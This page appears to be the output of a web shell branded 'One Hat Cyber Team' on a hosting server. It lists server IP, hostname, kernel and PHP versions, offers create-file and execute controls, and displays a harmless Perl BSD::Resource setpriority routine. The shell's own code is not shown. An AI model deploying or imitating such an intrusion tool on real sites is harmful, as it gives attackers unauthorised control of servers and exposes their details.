����
One Hat Cyber Team
One Hat Cyber Team
Your IP :
18.221.229.47
Server IP :
192.185.194.254
Server :
Linux raider.websitewelcome.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Server Software :
Apache
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib64
/
perl5
/
vendor_perl
/
auto
/
BSD
/
Resource
/
View File Name :
setpriority.al
# NOTE: Derived from blib/lib/BSD/Resource.pm. # Changes made here will be lost when autosplit is run again. # See AutoSplit.pm. package BSD::Resource; #line 625 "blib/lib/BSD/Resource.pm (autosplit into blib/lib/auto/BSD/Resource/setpriority.al)" sub setpriority (;$$$) { my ($which, $who, $prio) = @_; if (@_) { $which = _find_prio('setpriority', $which); } if (@_ == 3) { _setpriority($which, $who, $prio); } elsif (@_ == 2) { _setpriority($which, $who); } elsif (@_ == 1) { _setpriority($which); } else { _setpriority(); } } # end of BSD::Resource::setpriority 1;